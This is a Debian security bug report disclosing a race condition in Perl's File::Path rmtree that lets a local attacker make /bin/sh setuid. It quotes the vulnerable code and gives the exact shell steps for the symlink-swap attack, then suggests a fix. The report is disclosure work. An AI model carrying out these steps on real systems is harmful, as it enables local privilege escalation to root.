更新时间:2022-09-19 22:09:01
Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole
Noting USN-44-1 e.g. in
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html
I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:
170 (undef, undef, my $rp) = lstat $root or next;
171 $rp &= 07777; # don't forget setuid, setgid, sticky bits
172 if ( -d _ ) {
...
209 if (rmdir $root) {
210 ++$count;
211 }
212 else {
213 carp "Can't remove directory $root: $!";
214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root))
215 or carp("and can't restore permissions to "
216 . sprintf("0%o",$rp) . "/n");
217 }
218 }
...
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
mkdir -p /tmp/psz/sh
perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
chmod 4777 /tmp/psz/sh
While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:
mv /tmp/psz/sh /tmp/psz/dummy
ln -s /bin/sh /tmp/psz/sh
Root would have recorded the permissions of /tmp/psz/sh, but would
"restore" it to /bin/sh.
I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.
(A few minutes ago I emailed the File::Path authors Tim.Bunce@ig.co.uk
and bailey@newman.upenn.edu; Tim.Bunce bounced.)
Cheers,
Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction